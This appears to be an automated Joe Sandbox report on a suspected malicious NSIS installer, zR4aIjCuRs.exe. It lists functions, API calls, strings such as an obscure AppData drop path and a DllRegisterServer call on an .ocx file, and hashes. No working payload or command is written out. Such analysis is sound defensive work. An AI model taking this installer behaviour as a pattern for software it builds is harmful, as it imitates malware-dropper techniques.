RichEdit, xrefs: 00403C05
1033, xrefs: 004039CA, 00403A26
_Nb, xrefs: 00403B2E, 00403B96
RichEdit20W, xrefs: 00403BF6, 00403BFC
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 00403A3A, 00403A42, 00403AE5, 00403AEB, 00403AFB
.exe, xrefs: 00403AB8
C:\Users\user\AppData\Local\Temp\, xrefs: 004039B6
RichEd20, xrefs: 00403BD8
Space available: , xrefs: 00403A72, 00403A7B, 00403A89, 00403AD8, 00403ADE

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$Space available: $_Nb
API String ID: 1975747703-1620046868
Opcode ID: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
Instruction ID: 064cc6771aa4ec85c149aa806f0e8f7fc9ed350ba8b4bb786133750ec3f232c3
Opcode Fuzzy Hash: 10a6a98043c72b95613d0452641e3dda201b8ff11259fa49b57e5ba6e55a18f5
Instruction Fuzzy Hash: 9061A7312007007ED720AF669D46E2B3A6CEB85B4AF40157FF945B51E2CBBDA941CB2D

Function 00402EDD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(00442800,00402F1D,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

Inst, xrefs: 00402FC2
C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
soft, xrefs: 00402FCB
"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 00402EDD
Null, xrefs: 00402FD4
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
Error launching installer, xrefs: 00402F2D

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3999871799
Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD

Function 004062DC Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Space available: ,00000400), ref: 0040641D
GetWindowsDirectoryW.KERNEL32(Space available: ,00000400,00000000,Completed,?,00405359,Completed,00000000), ref: 00406430
SHGetSpecialFolderLocation.SHELL32(00405359,0041BA49,00000000,Completed,?,00405359,Completed,00000000), ref: 0040646C
SHGetPathFromIDListW.SHELL32(0041BA49,Space available: ), ref: 0040647A
CoTaskMemFree.OLE32(0041BA49), ref: 00406485
lstrcatW.KERNEL32(Space available: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
lstrlenW.KERNEL32(Space available: ,00000000,Completed,?,00405359,Completed,00000000), ref: 00406503

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063ED
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004064A5
Completed, xrefs: 00406301
Space available: , xrefs: 00406306, 004063E1, 004063E8, 004063EC, 00406406, 00406407, 0040641C, 0040642F, 0040644B, 00406476, 004064AA, 004064B0, 004064CC, 004064DF, 004064FC, 00406502, 0040650E, 00406541

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Completed$Software\Microsoft\Windows\CurrentVersion$Space available: $\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-92884433
Opcode ID: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
Instruction ID: 9562dd14d952d55a61127842092d6448be61ccc4685f782e3002b21b8a961bfb
Opcode Fuzzy Hash: fa0a2b683e095286a2d5fbab2c7d000eed8338a12233a5ea9fb98a8af75b8457
Instruction Fuzzy Hash: 38611171A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,DllRegisterServer,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,DllRegisterServer,DllRegisterServer,00000000,00000000,DllRegisterServer,C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges,?,?,00000031), ref: 004017D5

Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Dicyanodiamide Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7

Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Strings

C:\Users\user\Desktop\xerophily.ocx, xrefs: 00401835, 00401851
DllRegisterServer, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges$C:\Users\user\Desktop\xerophily.ocx$DllRegisterServer
API String ID: 1941528284-1953730542
Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D

Function 00405322 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
lstrlenW.KERNEL32(0040327A,Completed,00000000,0041BA49,753B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041BA49,753B23A0), ref: 0040537D
SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD

Strings

Completed, xrefs: 00405343, 00405353, 00405359, 0040537C, 00405388

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
Instruction ID: 851cb2e595d07e8670ef4c489cf40fd5108cb81fe88e509cf6dd9e4b353e565e
Opcode Fuzzy Hash: 74e9fe34f80c9fd4ff69564e83979c50d7f5e186eca222eace7b8ab87805a7eb
Instruction Fuzzy Hash: 20218371900518BACF11AFA5DD859CFBFB9EF45350F14807AF904B62A0C7B94A40DFA8

Function 00403116 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403180
GetTickCount.KERNEL32 ref: 00403227
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403250
wsprintfW.USER32 ref: 00403263

Strings

... %d%%, xrefs: 0040325D
@, xrefs: 0040319A
TmA, xrefs: 004031ED, 004031FF

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$TmA$@
API String ID: 551687249-1145333836
Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
wsprintfW.USER32 ref: 00406676
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A

Strings

\, xrefs: 0040664C
UXTHEME, xrefs: 0040662D
%s%S.dll, xrefs: 00406670

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DFD
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\zR4aIjCuRs.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,753B3420,004035D9), ref: 00405E18

Strings

"C:\Users\user\Desktop\zR4aIjCuRs.exe", xrefs: 00405DDF
nsa, xrefs: 00405DEC
C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zR4aIjCuRs.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\zR4aIjCuRs.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2148918975
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

Function 00404ADE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
wsprintfW.USER32 ref: 00404B88
SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B

Strings

%u.%u%s%s, xrefs: 00404B69

Memory Dump Source

Source File: 00000000.00000002.273509291450.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273509185940.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509337713.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509381160.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273509624054.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File

